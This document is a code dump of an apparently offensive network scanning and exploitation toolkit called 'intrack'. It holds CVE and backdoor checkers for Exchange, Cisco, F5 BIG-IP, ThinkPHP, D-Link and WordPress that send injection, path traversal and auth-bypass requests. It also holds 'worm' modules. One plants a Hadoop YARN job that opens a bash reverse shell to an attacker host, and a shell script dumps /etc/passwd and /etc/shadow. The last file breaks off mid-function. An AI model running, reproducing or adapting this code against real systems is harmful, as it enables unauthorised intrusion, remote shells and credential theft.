--------------------------------------------------------------------------------
/intrack/lib/vulns/microsoft/CVE_2021_34473.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2021_34473(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	paths = ["/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com", "/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"]
 8 | 	matchers = ["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException", "Exchange MAPI/HTTP Connectivity Endpoint"]
 9 | 	protocols = ["http", "https"]
10 | 	if ports is None:
11 | 		ports = [80]
12 | 	else:
13 | 		ports = [f":{port}" for port in ports]
14 | 
15 | 	for protocol in protocols:
16 | 		for path in paths:
17 | 			for port in ports:
18 | 				url = f"{protocol}://{ip}{port}{path}"
19 | 				try:
20 | 					response = requests.get(url, verify=False, timeout=timeout, headers=headers)
21 | 					if response.text and any(matcher in response.text for matcher in matchers):
22 | 						print_colour(f"The target is vulnerable to CVE-2021-34473 : {url}")
23 | 						return True
24 | 				except requests.RequestException:
25 | 					continue
26 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/backdoors/webshell_backdoor.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def webshell_backdoor(ip, ports=None, timeout=10):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 |     
13 |     webshell_patterns = ["uname -a", "file_put_contents", "shell_exec", "system(", 
14 |                         "FilesManager", "password", "passthru", "Terminal", "exec(", "eval("]
15 |     
16 |     for port in ports:
17 |         for protocol in protocols:
18 |             base_url = f"{protocol}://{ip}{port}"
19 |             for pattern in webshell_patterns:
20 |                 url = f"{base_url}/{pattern}"
21 |                 try:
22 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
23 |                     if response.status_code == 200:
24 |                         print_colour(f"[+] Webshell found: {url}")
25 |                         return True
26 |                 except requests.RequestException:
27 |                     continue
28 |     return False
29 |     


--------------------------------------------------------------------------------
/intrack/lib/vulns/thinkphp/CVE_2022_47945.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | def check_CVE_2022_47945(ip, ports=None, timeout=5):
 5 |     headers = {
 6 |     'User-Agent': user_agents()
 7 |     }
 8 |     macthers = ['Call Stack', 'class="trace']
 9 |     paths = [
10 |     "/?lang=../../thinkphp/base",
11 |     "/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
12 |     ]
13 | 
14 |     protocols = ["http", "https"]
15 |     if ports is None:
16 |         ports = [80]
17 |     else:
18 |         ports = [f":{port}" for port in ports]
19 | 
20 |     for protocol in protocols:
21 |         for port in ports:
22 |             for path in paths:
23 |                 url = f"{protocol}://{ip}{port}{path}"
24 |                 try:
25 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
26 |                     if any(matcher in response.text for matcher in matchers):
27 |                         print_colour(f"The target is vulnerable to CVE-2022-47945 : {url}")
28 |                         return True
29 |                 except requests.RequestException:
30 |                     continue
31 |     return False


--------------------------------------------------------------------------------
/intrack/lib/instances/thinkphp.py:
--------------------------------------------------------------------------------
 1 | import random
 2 | import string
 3 | import requests
 4 | from intrack.lib.headers.headers_handler import user_agents
 5 | from intrack.lib.color_handler import print_colour
 6 | 
 7 | def generate_string(length=8):
 8 |     return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
 9 | 
10 | def check_thinkphp(ip, ports=None, timeout=5):
11 | 	headers = {
12 | 	'User-Agent': user_agents()
13 | 	}
14 | 	paths = ["", "/", f"/?s={generate_string()}&c={generate_string()}&a={generate_string()}&m={generate_string()}"]
15 | 	matchers = [      
16 | 	'/Library/Think/',
17 | 	'{ Fast & Simple OOP PHP Framework } -- [ WE CAN DO IT JUST THINK ]',
18 | 	'/thinkphp/library/think/'
19 | 	]
20 | 	protocols = ["http", "https"]
21 | 	if ports is None:
22 | 		ports = [80]
23 | 	else:
24 | 		ports = [f":{port}" for port in ports]
25 | 
26 | 	for protocol in protocols:
27 | 		for port in ports:
28 | 			for path in paths:
29 | 				url = f"{protocol}://{ip}{port}{path}"
30 | 				try:
31 | 					response = requests.get(url, headers=headers, verify=False, timeout=timeout)
32 | 					if any(matcher in response.text for matcher in matchers):
33 | 						print_colour(f"ThinkPHP detected: {url}")
34 | 						return True
35 | 				except requests.RequestException:
36 | 					continue
37 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/instances/server_scanner.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | from intrack.lib.headers.headers_handler import user_agents  
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def check_servers(ip, ports=None, timeout=5):
 7 |     protocols = ["http", "https"]
 8 | 
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 | 
14 |     for port in ports:
15 |         for protocol in protocols:
16 |             try:
17 |                 url = f"{protocol}://{ip}{port}"
18 |                 
19 |                 headers = {
20 |                     'User-Agent': user_agents()
21 |                 }
22 | 
23 |                 response = requests.get(url, headers=headers, timeout=timeout, allow_redirects=True, verify=False)
24 | 
25 |                 http_element = re.findall(r'<title>(.*)</title>', response.text)
26 |                 http_title = http_element[0] if http_element else "No title found"
27 | 
28 |                 server = response.headers.get('Server', 'No server header')
29 |                 status_code = response.status_code
30 | 
31 |                 print_colour(f"[+] {url} [{status_code}] [{server}] [{http_title}]")
32 |                 return True
33 | 
34 |             except requests.RequestException:
35 |                 continue
36 | 
37 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/wordpress/CVE_2017_5487.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2017_5487(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     wordpress_api_endpoints = ["/?rest_route=/wp/v2/users/", "/wp-json/wp/v2/users/"]
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |     for protocol in protocols:
14 |         for port in ports:
15 |             for path in wordpress_api_endpoints:
16 |                 url = f"{protocol}://{ip}{port}{path}"
17 |                 try:
18 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
19 |                     response.raise_for_status()
20 |                     user_data = response.json()
21 |                     if isinstance(user_data, list):
22 |                         for user in user_data:
23 |                             if 'slug' in user:
24 |                                 print_colour(f"The target is vulnerable to CVE-2017-5487 : {url} [{user['slug']}]")
25 |                         return True
26 |                 except requests.RequestException:
27 |                     continue
28 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/cisco/CVE_2020_3452.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2020_3452(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     paths = [
 8 |         "/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../",
 9 |         "/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
10 |     ]
11 |     protocols = ["http", "https"]
12 |     if ports is None:
13 |         ports = [443]
14 |     else:
15 |         ports = [f":{port}" for port in ports]
16 |         
17 |     for protocol in protocols:
18 |         for port in ports:
19 |             for path in paths:
20 |                 url = f"{protocol}://{ip}{port}{path}"
21 |                 try:
22 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
23 |                     if "Cisco Systems" in response.text and "SSL VPN Service" in response.text:
24 |                         print_colour(f"[+] Target is vulnerable to CVE-2020-3452 (Cisco ASA/FTX Path Traversal): {url}")
25 |                         return True
26 |                 except requests.RequestException:
27 |                     continue
28 |     return False 


--------------------------------------------------------------------------------
/intrack/lib/network/adb_misconfig.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import socket
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_adb(ip, ports=None):
 6 |     if ports is None:
 7 |         ports = [5555]
 8 |     else:
 9 |         ports = [port for port in ports]
10 |     for port in ports:
11 |         try:
12 |             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13 |             sock.settimeout(5)
14 |             sock.connect((ip, port))
15 |             sock.send(b"\x43\x4e\x58\x4e\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x00\x32\x02\x00\x00\xbc\xb1\xa7\xb1\x68\x6f\x73\x74\x3a\x3a\x00")
16 |             data = sock.recv(2048)
17 |             data = data.decode('utf-8', 'ignore')
18 |             product_name = re.search(r"product.name=(.*?);", data)
19 |             product_model = re.search(r"ro.product.model=(.*?);", data)
20 |             product_device = re.search(r"ro.product.device=(.*?);", data)
21 |             if product_name or product_model or product_device:
22 |                 print_colour(f"[+] Android Debug Bridge: {ip}:{port} [Product Name: {product_name.group(1) if product_name else 'N/A'}] [Product Model: {product_model.group(1) if product_model else 'N/A'}] [Product Device: {product_device.group(1) if product_device else 'N/A'}]")
23 |                 return True
24 |         except Exception:
25 |             return False
26 |         finally:
27 |             sock.close()
28 |     return False


--------------------------------------------------------------------------------
/intrack/lib/backdoors/dlink_backdoor.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def dlink_backdoor(ip, ports=None, timeout=10):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     if ports is None:
 8 |         ports = [80, 8080]
 9 |     else:
10 |         ports = ports
11 |     
12 |     auth_bypass_paths = [
13 |         "/command.php?cmd=cat%20/etc/passwd",
14 |         "/diagnostic.php?act=ping&ipaddress=;cat%20/etc/passwd",
15 |         "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%20/etc/passwd",
16 |         "/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=;cat%20/etc/passwd"
17 |     ]
18 |     
19 |     success_patterns = ["root:", "bin:", "nobody:"]
20 |     
21 |     for port in ports:
22 |         for proto in ["http", "https"]:
23 |             for path in auth_bypass_paths:
24 |                 url = f"{proto}://{ip}:{port}{path}"
25 |                 try:
26 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
27 |                     if any(pattern in response.text for pattern in success_patterns):
28 |                         print_colour(f"[+] D-Link backdoor detected: {url}")
29 |                         return True
30 |                 except requests.RequestException:
31 |                     continue
32 |     return False


--------------------------------------------------------------------------------
/intrack/lib/backdoors/php_backdoor.py:
--------------------------------------------------------------------------------
 1 | 
 2 | import requests
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def php_backdoor(ip, ports=None, timeout=10):
 7 |     headers = {"User-Agent": user_agents()}
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |     
14 |     test_params = {
15 |         "cmd": "id",
16 |         "c": "id",
17 |         "command": "id",
18 |         "exec": "id",
19 |         "system": "id",
20 |     }
21 |     
22 |     php_patterns = ["uid=", "gid=", "groups="]
23 |     
24 |     for port in ports:
25 |         for protocol in protocols:
26 |             common_paths = [
27 |                 "/index.php", "/admin.php", "/upload.php", "/images/up.php", 
28 |                 "/includes/config.php", "/tmp/sess_", "/wp-content/uploads/temp.php"
29 |             ]
30 |             for path in common_paths:
31 |                 base_url = f"{protocol}://{ip}{port}{path}"
32 |                 for param, value in test_params.items():
33 |                     url = f"{base_url}?{param}={value}"
34 |                     try:
35 |                         response = requests.get(url, headers=headers, verify=False, timeout=timeout)
36 |                         if any(pattern in response.text for pattern in php_patterns):
37 |                             print_colour(f"[+] PHP backdoor detected: {url}")
38 |                             return True
39 |                     except requests.RequestException:
40 |                         continue
41 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/microsoft/CVE_2017_7269.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import re
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def check_CVE_2017_7269(ip, ports=None, timeout=5):
 7 |     headers = {"User-Agent": user_agents()}
 8 |     
 9 |     protocols = ["http", "https"]
10 |     if ports is None:
11 |         ports = [80]
12 |     else:
13 |         ports = [f":{port}" for port in ports]
14 | 
15 |     for protocol in protocols:
16 |         for port in ports:
17 |             url = f"{protocol}://{ip}{port}"
18 |             try:
19 |                 response = requests.options(url, verify=False, timeout=timeout, headers=headers)
20 |                 dav_sql_match = re.search(r"<DAV:sql>", response.text)
21 |                 dav_version_match = re.search(r"[\d]+(,\s+[\d]+)?", response.headers.get("dav", ""))
22 |                 propfind_public_match = re.search(r".*?PROPFIND", response.headers.get("public", ""))
23 |                 propfind_allow_match = re.search(r".*?PROPFIND", response.headers.get("allow", ""))
24 | 
25 |                 dsl_condition = any([
26 |                     dav_sql_match, 
27 |                     dav_version_match, 
28 |                     propfind_public_match, 
29 |                     propfind_allow_match
30 |                 ])
31 | 
32 |                 if "IIS/6.0" in response.headers.get("server", "") and dsl_condition:
33 |                     print_colour(f"The target is vulnerable to CVE-2017-7269 : {url}")
34 |                     return True
35 |             except requests.RequestException:
36 |                 continue
37 |     
38 |     return False
39 | 


--------------------------------------------------------------------------------
/intrack/lib/worms/hadoop_worm.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | 
 4 | def hadoop_worm(ip, lhost, lport, ports=None):
 5 |     path = "/ws/v1/cluster/apps/new-application"
 6 |     protocols = ["http", "https"]
 7 | 
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 | 
13 |     for protocol in protocols:
14 |         for port in ports:
15 |             url = f"{protocol}://{ip}{port}{path}"
16 |             headers = {
17 |                 'User-Agent': user_agents()
18 |             }
19 |             try:
20 |                 response = requests.get(url, headers=headers, timeout=10)
21 |                 app_id = response.json().get('application-id')
22 |                 if not app_id:
23 |                     continue
24 |                 
25 |                 data = {
26 |                     'application-id': app_id,
27 |                     'application-name': 'get-shell',
28 |                     'am-container-spec': {
29 |                         'commands': {
30 |                             'command': f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
31 |                         },
32 |                     },
33 |                     'application-type': 'YARN',
34 |                 }
35 | 
36 |                 for _ in range(2):
37 |                     requests.post(url, json=data, headers=headers)
38 |                     print(f"Payload successfully planted {ip}")
39 |                     return True
40 |                 print(lhost, lport)
41 |             except requests.RequestException:
42 |                 print(f"Failed to exploit {ip}")
43 |                 continue
44 |     return False


--------------------------------------------------------------------------------
/intrack/lib/iot/hikvision_scanner.py:
--------------------------------------------------------------------------------
 1 | import mmh3
 2 | import requests
 3 | import base64
 4 | from intrack.lib.headers.headers_handler import user_agents
 5 | from intrack.lib.color_handler import print_colour
 6 | 
 7 | def check_hikvision(ip, ports=None, timeout=5):
 8 |     headers = {
 9 |         "User-Agent": user_agents()
10 |     }
11 |     paths = ["", "/", "/index.asp", "/favicon.ico", "/doc/page/login.asp"]
12 |     matchers = ["Hikvision Digital Technology", "/doc/page/login.asp?_"]
13 |     protocols = ["http", "https"]
14 |     target_favicon_hash = 999357577
15 | 
16 |     if ports is None:
17 |         ports = [80]
18 |     else:
19 |         ports = [f":{port}" for port in ports]
20 | 
21 |     for protocol in protocols:
22 |         for path in paths:
23 |             for port in ports:
24 |                 url = f"{protocol}://{ip}{port}"
25 |                 url_ = f"{url}{path}"
26 |                 try:
27 |                     response = requests.get(url_, timeout=timeout, verify=False, headers=headers)
28 |                     if response is not None:
29 |                         server = response.headers.get('Server', '')
30 |                         favicon_base64 = base64.b64encode(response.content) if response.content else None
31 |                         favicon_hash = mmh3.hash(favicon_base64.decode('utf-8')) if favicon_base64 else None
32 |                         if response.text and (any(matcher in response.text for matcher in matchers) or "Hikvision-Webs" in server or favicon_hash == target_favicon_hash):
33 |                             print_colour(f"Hikvision device found: {url}")
34 |                             return True
35 | 
36 |                 except requests.RequestException:
37 |                     continue
38 | 
39 |     return False


--------------------------------------------------------------------------------
/intrack/lib/worms/worm.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | enumerate_system(){
 4 |     echo ""
 5 |     echo "[+] Directory listing of /etc:"
 6 |     echo ""
 7 |     ls -al /etc || echo "[-] Error: Unable to list /etc directory"
 8 | 
 9 |     echo ""
10 |     echo "[+] Recursive listing of /etc:"
11 |     echo ""
12 |     ls -R /etc || echo "[-] Error: Unable to recursively list /etc"
13 | 
14 |     echo ""
15 |     echo "[+] List of running processes:"
16 |     echo ""
17 |     ps -ef || echo "[-] Error: Unable to list processes"
18 | 
19 |     echo ""
20 |     echo "[+] List of active network connections:"
21 |     echo ""
22 |     netstat -tunap || echo "[-] Error: Unable to list network connections"
23 | 
24 |     if [ -d "/etc/config/" ]; then
25 |         echo "[+] Directory listing of /etc/config:"
26 |         echo ""
27 |         ls -al /etc/config || echo "[-] Error: Unable to list /etc/config directory"
28 | 
29 |         echo ""
30 |         for file in /etc/config/*; do
31 |             echo "[+] Contents of $file:"
32 |             cat "$file" || echo "[-] Error: Unable to read $file"
33 |             echo ""
34 |         done
35 |     else
36 |         echo ""
37 |         echo "[+] /etc/config directory not found"
38 |         echo ""
39 |     fi
40 | 
41 |     echo "[+] Checking /etc/passwd and /etc/shadow files"
42 | 
43 |     if [ -f "/etc/passwd" ]; then
44 |         echo "[+] Contents of /etc/passwd:"
45 |         cat /etc/passwd || echo "[-] Error: Unable to read /etc/passwd"
46 |     else
47 |         echo "[-] /etc/passwd file not found"
48 |     fi
49 | 
50 |     if [ -f "/etc/shadow" ]; then
51 |         echo "[+] Contents of /etc/shadow (requires root):"
52 |         sudo cat /etc/shadow || echo "[-] Error: Unable to read /etc/shadow"
53 |     else
54 |         echo "[-] /etc/shadow file not found"
55 |     fi
56 | }
57 | 
58 | enumerate_system


--------------------------------------------------------------------------------
/intrack/lib/vulns/cisco/CVE_2020_3259.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2020_3259(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     path = "/crossdomain.xml"
 8 |     fingerprint_paths = ["/webui/logon.html", "/webui/", "/api/v1/"]
 9 |     protocols = ["http", "https"]
10 |     if ports is None:
11 |         ports = [80, 443]
12 |     else:
13 |         ports = [f":{port}" for port in ports]
14 |         
15 |     for protocol in protocols:
16 |         for port in ports:
17 |             # First check if it's IOS XR
18 |             is_ios_xr = False
19 |             for fp_path in fingerprint_paths:
20 |                 fp_url = f"{protocol}://{ip}{port}{fp_path}"
21 |                 try:
22 |                     response = requests.get(fp_url, verify=False, timeout=timeout, headers=headers)
23 |                     if "Cisco IOS XR" in response.text or "IOS-XR" in response.text:
24 |                         is_ios_xr = True
25 |                         break
26 |                 except requests.RequestException:
27 |                     continue
28 |                 
29 |             if is_ios_xr:
30 |                 # Check for vulnerability
31 |                 url = f"{protocol}://{ip}{port}{path}"
32 |                 try:
33 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
34 |                     if response.status_code == 200 and "<allow-access-from domain=\"*\"" in response.text:
35 |                         print_colour(f"[+] Target may be vulnerable to CVE-2020-3259 (Cisco IOS XR RCE): {url}")
36 |                         return True
37 |                 except requests.RequestException:
38 |                     continue
39 |     return False 


--------------------------------------------------------------------------------
/intrack/lib/backdoors/cisco_backdoor.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def cisco_backdoor(ip, ports=None, timeout=5):
 7 |     headers = {
 8 |         "User-Agent": user_agents(),
 9 |         "Authorization": "0ff4fbf0ecffa77ce8d3852a29263e263838e9bb"
10 |     }
11 |     paths = ["/webui/logoutconfirm.html?logon_hash=1", "/webui/logoutconfirm.html?logon_hash=1"]
12 |     s = requests.Session()
13 | 
14 |     protocols = ["http", "https"]
15 |     if ports is None:
16 |         ports = [80]
17 |     else:
18 |         ports = [f":{port}" for port in ports]
19 | 
20 |     
21 |     for path in paths:
22 |         for port in ports:
23 |             for protocol in protocols:
24 |                 get = f"{protocol}://{ip}{port}/webui"
25 |                 post = f"{protocol}://{ip}{port}/webui/logoutconfirm.html?logon_hash=1"
26 |                 try:
27 |                     url = f"{protocol}://{ip}{port}{path}"
28 |                     response_get = requests.get(url, verify=False, timeout=timeout, headers=headers)
29 |                     response_post = requests.post(url, verify=False, timeout=timeout, headers=headers)
30 |                     if re.search(r'webui-centerpanel-title', response_get.text) or re.search(r'^([a-f0-9]{18})\s*$', response_get.text):
31 |                         print_colour(f"[+] Cisco backdoor detected: {url}")
32 |                         return True
33 |                     if re.search(r'webui-centerpanel-title', response_post.text) or re.search(r'^([a-f0-9]{18})\s*$', response_post.text):
34 |                         print_colour(f"[+] Cisco backdoor detected: {url}")
35 |                         return True
36 |                 except requests.RequestException:
37 |                         continue
38 |     return False
39 | 


--------------------------------------------------------------------------------
/intrack/lib/instances/php.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def php(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 |     
13 |     for port in ports:
14 |         for protocol in protocols:
15 |             url = f"{protocol}://{ip}{port}"
16 |             try:
17 |                 response = requests.head(url, timeout=timeout, verify=False, headers=headers)
18 |                 server_header = response.headers.get("Server", "")
19 |                 power_header = response.headers.get("X-Powered-By", "")
20 |                 
21 |                 if "PHP" in server_header or "PHP" in power_header:
22 |                     print_colour(f"[+] PHP Detected: {url} (via headers)")
23 |                     return True
24 |                 
25 |                 php_files = ["/index.php", "/info.php", "/phpinfo.php", "/test.php", "/admin.php", "/wp-login.php"]
26 |                 for php_file in php_files:
27 |                     file_url = f"{url}{php_file}"
28 |                     try:
29 |                         file_response = requests.get(file_url, timeout=timeout, verify=False, headers=headers)
30 |                         if file_response.status_code == 200 and any(marker in file_response.text for marker in ["PHP Version", "<? php", "<?php"]):
31 |                             print_colour(f"[+] PHP Detected: {file_url}")
32 |                             return True
33 |                     except requests.RequestException:
34 |                         continue
35 |                     
36 |             except requests.RequestException:
37 |                 continue
38 |     return False


--------------------------------------------------------------------------------
/intrack/lib/instances/demo.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import ssl
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | matchers = ["WordPress</title>", "/wp-login.php?action=lostpassword"]
 7 | 
 8 | def send_request(ip, port, use_ssl, timeout):
 9 |     """
10 |     Sends an HTTP GET request using raw sockets and returns the response.
11 |     """
12 |     try:
13 |         sock = socket.create_connection((ip, port), timeout=timeout)
14 | 
15 |         if use_ssl:
16 |             context = ssl.create_default_context()
17 |             sock = context.wrap_socket(sock, server_hostname=ip)
18 | 
19 |         request = f"GET /wp-login.php HTTP/1.1\r\n"
20 |         request += f"Host: {ip}\r\n"
21 |         request += f"User-Agent: {user_agents()}\r\n"
22 |         request += "Connection: close\r\n\r\n"
23 | 
24 |         sock.sendall(request.encode())
25 | 
26 |         response = b""
27 |         while True:
28 |             chunk = sock.recv(4096)
29 |             if not chunk:
30 |                 break
31 |             response += chunk
32 | 
33 |         sock.close()
34 |         return response.decode(errors="ignore")  # Decode with error handling for non-UTF-8 data
35 | 
36 |     except (socket.timeout, socket.error, ssl.SSLError) as e:
37 |         return None
38 | 
39 | def check_wordpress(ip, ports=None, timeout=5):
40 |     protocols = [("http", 80, False), ("https", 443, True)]
41 | 
42 |     if ports:
43 |         ports = [(None, port, False) for port in ports]  # Custom ports, assume HTTP
44 | 
45 |     for protocol, port, use_ssl in (protocols + (ports or [])):
46 |         response = send_request(ip, port, use_ssl, timeout)
47 | 
48 |         if response and any(matcher in response for matcher in matchers):
49 |             print_colour(f"[+] Found WordPress site: {protocol}://{ip}:{port}")
50 |             return True
51 | 
52 |     return False
53 | 


--------------------------------------------------------------------------------
/intrack/lib/exposures/api_docs_scanner.py:
--------------------------------------------------------------------------------
 1 | # api_docs_scanner.py
 2 | import requests
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def check_api_docs(ip, ports=None, timeout=5):
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 |     
13 |     api_paths = [
14 |         "/swagger",
15 |         "/swagger-ui.html",
16 |         "/swagger/index.html",
17 |         "/api-docs",
18 |         "/docs",
19 |         "/redoc",
20 |         "/openapi.json",
21 |         "/swagger.json",
22 |         "/api/swagger",
23 |         "/api/documentation",
24 |         "/api/v1/docs",
25 |         "/api/v2/docs",
26 |         "/api/v3/docs",
27 |         "/swagger/v1/swagger.json",
28 |         "/v1/swagger.json",
29 |         "/v2/swagger.json",
30 |         "/v3/swagger.json"
31 |     ]
32 |     
33 |     indicators = [
34 |         "swagger",
35 |         "openapi",
36 |         "API Documentation",
37 |         "Swagger UI",
38 |         "ReDoc",
39 |         "OpenAPI Definition",
40 |         "API Reference",
41 |         "API Explorer"
42 |     ]
43 |     
44 |     for port in ports:
45 |         for protocol in protocols:
46 |             for path in api_paths:
47 |                 try:
48 |                     headers = {
49 |                         'User-Agent': user_agents()
50 |                     }
51 |                     url = f"{protocol}://{ip}{port}{path}"
52 |                     response = requests.get(url, headers=headers, timeout=timeout, verify=False)
53 |                     if any(indicator.lower() in response.text.lower() for indicator in indicators):
54 |                         print_colour(f"[+] API Documentation found: {url}")
55 |                         return True
56 |                 except requests.RequestException:
57 |                     continue
58 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/f5bigip/CVE_2022_1388.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import json
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def check_CVE_2022_1388(ip, ports=None, timeout=5):
 7 |     """
 8 |     Check for CVE-2022-1388 - Authentication bypass vulnerability in F5 BIG-IP
 9 |     This vulnerability allows unauthenticated attackers to execute arbitrary commands via the management interface
10 |     """
11 |     if ports is None:
12 |         ports = [443, 8443]  # Default BIG-IP management ports
13 |     else:
14 |         ports = [int(port) for port in ports]
15 |     
16 |     headers = {
17 |         "User-Agent": user_agents(),
18 |         "Connection": "keep-alive, X-F5-Auth-Token",
19 |         "Authorization": "Basic YWRtaW46",  # Base64 of "admin:"
20 |         "X-F5-Auth-Token": "dummy",
21 |         "Content-Type": "application/json"
22 |     }
23 |     
24 |     payload = {
25 |         "command": "run",
26 |         "utilCmdArgs": "-c 'tmsh show sys version'"
27 |     }
28 |     
29 |     vulnerable = False
30 |     
31 |     for port in ports:
32 |         url = f"https://{ip}:{port}/mgmt/tm/util/bash"
33 |         
34 |         try:
35 |             response = requests.post(
36 |                 url, 
37 |                 headers=headers, 
38 |                 json=payload, 
39 |                 verify=False, 
40 |                 timeout=timeout
41 |             )
42 |             
43 |             if response.status_code == 200 and "commandResult" in response.text:
44 |                 vulnerable = True
45 |                 version_info = json.loads(response.text).get("commandResult", "")
46 |                 print_colour(f"[+] The target is vulnerable to CVE-2022-1388 (F5 BIG-IP Auth Bypass): {url}")
47 |                 ver = version_info.split("Version ")[1].split("\n")[0] if "Version" in version_info else "Unknown"
48 |                 print_colour(f"[+] Software version: {ver}")
49 |                 return True
50 |                 
51 |         except requests.RequestException:
52 |             continue
53 |     
54 |     return vulnerable 


--------------------------------------------------------------------------------
/intrack/lib/worms/microsoft_worm.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | 
 4 | CVE_PATHS = {
 5 |     "CVE_2023_41265": "/resources/qmc/fonts/CVE-2023-41265.ttf",
 6 |     "CVE_2023_29357": "/_api/web/siteusers",
 7 |     "CVE_2021_38647": "/wsman",
 8 |     "CVE_2021_34473": "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com",
 9 |     "CVE_2021_26855": "/owa/auth/x.js"
10 | }
11 | 
12 | def microsoft_worm(ip, port=None):
13 |     protocols = ["http", "https"]
14 |     ports = [f":{port}" if port else ""]
15 |     
16 |     for protocol in protocols:
17 |         for port_prefix in ports:
18 |             for path in CVE_PATHS.values():
19 |                 url = f"{protocol}://{ip}{port_prefix}"
20 |                 try:
21 |                     response = requests.get(url, timeout=10, verify=False)
22 |                     server = response.headers.get('Server', '')
23 |                     if "IIS" in server:
24 |                         url_base = f"{protocol}://{ip}{port_prefix}"
25 |                         extracted_ip = re.findall(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b', url_base)
26 |                         if extracted_ip:
27 |                             extracted_ip = extracted_ip[0]
